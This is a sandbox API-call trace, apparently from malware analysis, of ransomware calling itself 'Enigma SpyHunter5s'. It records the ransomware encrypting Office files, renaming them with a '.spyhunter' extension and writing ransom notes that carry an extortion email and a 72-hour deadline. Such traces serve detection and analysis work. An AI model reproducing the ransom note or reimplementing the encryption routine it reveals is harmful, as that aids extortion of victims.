WriteFile (in: hFile=0x170, lpBuffer=0x248fc84*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fc44, lpOverlapped=0x0 | out: lpBuffer=0x248fc84*, lpNumberOfBytesWritten=0x248fc44*=0x4, lpOverlapped=0x0) returned 1 [0099.696] WriteFile (in: hFile=0x170, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fc44, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fc44*=0x30, lpOverlapped=0x0) returned 1 [0099.696] CloseHandle (hObject=0x170) returned 1 [0099.696] GetProcessHeap () returned 0x2c0000 [0099.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x30efc0 [0099.696] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02077_.GIF.spyhunter") returned 90 [0099.696] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02077_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02077_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02077_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02077_.gif.spyhunter")) returned 1 [0099.696] GetProcessHeap () returned 0x2c0000 [0099.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30efc0 | out: hHeap=0x2c0000) returned 1 [0099.697] GetProcessHeap () returned 0x2c0000 [0099.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0099.697] GetProcessHeap () returned 0x2c0000 [0099.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3524e8 | out: hHeap=0x2c0000) returned 1 [0099.697] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fc88 | out: pbBuffer=0x248fc88) returned 1 [0099.697] GetProcessHeap () returned 0x2c0000 [0099.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0099.697] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fc80*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fc80*=0x30) returned 1 [0099.697] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Slipstream.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\slipstream.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0099.775] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Slipstream.thmx") returned 72 [0099.775] StrStrW (lpFirst="Slipstream.thmx", lpSrch=".txt") returned 0x0 [0099.775] GetProcessHeap () returned 0x2c0000 [0099.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0099.775] ReadFile (in: hFile=0x170, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fc44, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248fc44*=0x2800, lpOverlapped=0x0) returned 1 [0099.994] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0099.994] WriteFile (in: hFile=0x170, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fc44, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248fc44*=0x2800, lpOverlapped=0x0) returned 1 [0099.994] GetProcessHeap () returned 0x2c0000 [0099.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0099.994] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.994] WriteFile (in: hFile=0x170, lpBuffer=0x248fc84*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fc44, lpOverlapped=0x0 | out: lpBuffer=0x248fc84*, lpNumberOfBytesWritten=0x248fc44*=0x4, lpOverlapped=0x0) returned 1 [0099.995] WriteFile (in: hFile=0x170, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fc44, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fc44*=0x30, lpOverlapped=0x0) returned 1 [0099.995] CloseHandle (hObject=0x170) returned 1 [0099.996] GetProcessHeap () returned 0x2c0000 [0099.996] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x30efc0 [0099.996] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Slipstream.thmx.spyhunter") returned 82 [0099.996] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Slipstream.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\slipstream.thmx"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Slipstream.thmx.spyhunter" (normalized: "c:\\program files\\microsoft office\\document themes 14\\slipstream.thmx.spyhunter")) returned 1 [0099.996] GetProcessHeap () returned 0x2c0000 [0099.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30efc0 | out: hHeap=0x2c0000) returned 1 [0099.996] GetProcessHeap () returned 0x2c0000 [0099.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0099.997] GetProcessHeap () returned 0x2c0000 [0099.997] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3463a8 | out: hHeap=0x2c0000) returned 1 [0099.997] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0100.001] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0100.001] WriteFile (in: hFile=0x170, lpBuffer=0x248fbb7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248fce0, lpOverlapped=0x0 | out: lpBuffer=0x248fbb7*, lpNumberOfBytesWritten=0x248fce0*=0x127, lpOverlapped=0x0) returned 1 [0100.002] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0100.002] WriteFile (in: hFile=0x170, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248fce0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248fce0*=0x2ac, lpOverlapped=0x0) returned 1 [0100.002] CloseHandle (hObject=0x170) returned 1 [0100.002] GetProcessHeap () returned 0x2c0000 [0100.002] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x355888 | out: hHeap=0x2c0000) returned 1 [0100.002] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fc80 | out: pbBuffer=0x248fc80) returned 1 [0100.002] GetProcessHeap () returned 0x2c0000 [0100.003] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0100.003] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fc78*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fc78*=0x30) returned 1 [0100.003] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Waveform.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\waveform.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0100.311] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Waveform.xml") returned 82 [0100.311] StrStrW (lpFirst="Waveform.xml", lpSrch=".txt") returned 0x0 [0100.311] GetProcessHeap () returned 0x2c0000 [0100.312] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0100.312] ReadFile (in: hFile=0xb4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fc3c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248fc3c*=0x3c3, lpOverlapped=0x0) returned 1 [0100.379] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffc3d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0100.380] WriteFile (in: hFile=0xb4, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x3c3, lpNumberOfBytesWritten=0x248fc3c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248fc3c*=0x3c3, lpOverlapped=0x0) returned 1 [0100.380] GetProcessHeap () returned 0x2c0000 [0100.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0100.380] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.380] WriteFile (in: hFile=0xb4, lpBuffer=0x248fc7c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fc3c, lpOverlapped=0x0 | out: lpBuffer=0x248fc7c*, lpNumberOfBytesWritten=0x248fc3c*=0x4, lpOverlapped=0x0) returned 1 [0100.380] WriteFile (in: hFile=0xb4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fc3c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fc3c*=0x30, lpOverlapped=0x0) returned 1 [0100.380] CloseHandle (hObject=0xb4) returned 1 [0100.380] GetProcessHeap () returned 0x2c0000 [0100.380] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x30efc0 [0100.380] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Waveform.xml.spyhunter") returned 92 [0100.380] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Waveform.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\waveform.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Waveform.xml.spyhunter" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\waveform.xml.spyhunter")) returned 1 [0100.381] GetProcessHeap () returned 0x2c0000 [0100.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30efc0 | out: hHeap=0x2c0000) returned 1 [0100.381] GetProcessHeap () returned 0x2c0000 [0100.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0100.381] GetProcessHeap () returned 0x2c0000 [0100.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x356c80 | out: hHeap=0x2c0000) returned 1 [0100.381] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fc78 | out: pbBuffer=0x248fc78) returned 1 [0100.381] GetProcessHeap () returned 0x2c0000 [0100.381] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0100.381] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fc70*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fc70*=0x30) returned 1 [0100.382] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Technic.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\technic.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0100.382] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Technic.xml") returned 81 [0100.382] StrStrW (lpFirst="Technic.xml", lpSrch=".txt") returned 0x0 [0100.382] GetProcessHeap () returned 0x2c0000 [0100.382] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0100.382] ReadFile (in: hFile=0xb4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fc34, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248fc34*=0x3c2, lpOverlapped=0x0) returned 1 [0100.394] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffc3e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0100.394] WriteFile (in: hFile=0xb4, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x3c2, lpNumberOfBytesWritten=0x248fc34, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248fc34*=0x3c2, lpOverlapped=0x0) returned 1 [0100.394] GetProcessHeap () returned 0x2c0000 [0100.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0100.402] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.403] WriteFile (in: hFile=0xb4, lpBuffer=0x248fc74*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fc34, lpOverlapped=0x0 | out: lpBuffer=0x248fc74*, lpNumberOfBytesWritten=0x248fc34*=0x4, lpOverlapped=0x0) returned 1 [0100.543] WriteFile (in: hFile=0xb4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fc34, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fc34*=0x30, lpOverlapped=0x0) returned 1 [0100.547] CloseHandle (hObject=0xb4) returned 1 [0100.601] GetProcessHeap () returned 0x2c0000 [0100.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c961f8 [0100.602] wnsprintfW (in: pszDest=0x2c961f8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Technic.xml.spyhunter") returned 91 [0100.602] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Technic.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\technic.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Technic.xml.spyhunter" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\technic.xml.spyhunter")) returned 1 [0100.603] GetProcessHeap () returned 0x2c0000 [0100.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c961f8 | out: hHeap=0x2c0000) returned 1 [0100.603] GetProcessHeap () returned 0x2c0000 [0100.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0100.603] GetProcessHeap () returned 0x2c0000 [0100.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x356aa0 | out: hHeap=0x2c0000) returned 1 [0100.603] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fc78 | out: pbBuffer=0x248fc78) returned 1 [0100.603] GetProcessHeap () returned 0x2c0000 [0100.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0100.603] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fc70*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fc70*=0x30) returned 1 [0100.603] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\lodging.exe" (normalized: "c:\\program files\\microsoft office\\lodging.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.603] GetProcessHeap () returned 0x2c0000 [0100.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0100.603] GetProcessHeap () returned 0x2c0000 [0100.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c202e0 | out: hHeap=0x2c0000) returned 1 [0100.603] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0100.604] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0100.604] WriteFile (in: hFile=0xb4, lpBuffer=0x248fba7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248fcd0, lpOverlapped=0x0 | out: lpBuffer=0x248fba7*, lpNumberOfBytesWritten=0x248fcd0*=0x127, lpOverlapped=0x0) returned 1 [0100.604] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0100.605] WriteFile (in: hFile=0xb4, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248fcd0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248fcd0*=0x2ac, lpOverlapped=0x0) returned 1 [0100.605] CloseHandle (hObject=0xb4) returned 1 [0100.605] GetProcessHeap () returned 0x2c0000 [0100.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346728 | out: hHeap=0x2c0000) returned 1 [0100.605] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fc70 | out: pbBuffer=0x248fc70) returned 1 [0100.605] GetProcessHeap () returned 0x2c0000 [0100.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0100.605] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fc68*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fc68*=0x30) returned 1 [0100.605] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Waveform.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\waveform.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0100.606] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Waveform.thmx") returned 70 [0100.606] StrStrW (lpFirst="Waveform.thmx", lpSrch=".txt") returned 0x0 [0100.606] GetProcessHeap () returned 0x2c0000 [0100.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0100.606] ReadFile (in: hFile=0xb4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fc2c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248fc2c*=0x2800, lpOverlapped=0x0) returned 1 [0100.721] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0100.721] WriteFile (in: hFile=0xb4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fc2c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248fc2c*=0x2800, lpOverlapped=0x0) returned 1 [0100.721] GetProcessHeap () returned 0x2c0000 [0100.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0100.721] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.721] WriteFile (in: hFile=0xb4, lpBuffer=0x248fc6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fc2c, lpOverlapped=0x0 | out: lpBuffer=0x248fc6c*, lpNumberOfBytesWritten=0x248fc2c*=0x4, lpOverlapped=0x0) returned 1 [0100.839] WriteFile (in: hFile=0xb4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fc2c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fc2c*=0x30, lpOverlapped=0x0) returned 1 [0100.839] CloseHandle (hObject=0xb4) returned 1 [0100.839] GetProcessHeap () returned 0x2c0000 [0100.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cc62d0 [0100.840] wnsprintfW (in: pszDest=0x2cc62d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Waveform.thmx.spyhunter") returned 80 [0100.840] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Waveform.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\waveform.thmx"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Waveform.thmx.spyhunter" (normalized: "c:\\program files\\microsoft office\\document themes 14\\waveform.thmx.spyhunter")) returned 1 [0100.840] GetProcessHeap () returned 0x2c0000 [0100.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc62d0 | out: hHeap=0x2c0000) returned 1 [0100.840] GetProcessHeap () returned 0x2c0000 [0100.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0100.840] GetProcessHeap () returned 0x2c0000 [0100.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c16b30 | out: hHeap=0x2c0000) returned 1 [0100.841] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fc68 | out: pbBuffer=0x248fc68) returned 1 [0100.841] GetProcessHeap () returned 0x2c0000 [0100.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0100.841] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fc60*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fc60*=0x30) returned 1 [0100.841] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14982_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14982_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0100.919] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14982_.GIF") returned 73 [0100.919] StrStrW (lpFirst="BD14982_.GIF", lpSrch=".txt") returned 0x0 [0100.919] GetProcessHeap () returned 0x2c0000 [0100.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0100.919] ReadFile (in: hFile=0xb4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fc24, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248fc24*=0xc6, lpOverlapped=0x0) returned 1 [0100.921] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffff3a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0100.921] WriteFile (in: hFile=0xb4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xc6, lpNumberOfBytesWritten=0x248fc24, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248fc24*=0xc6, lpOverlapped=0x0) returned 1 [0100.921] GetProcessHeap () returned 0x2c0000 [0100.921] HeapFree 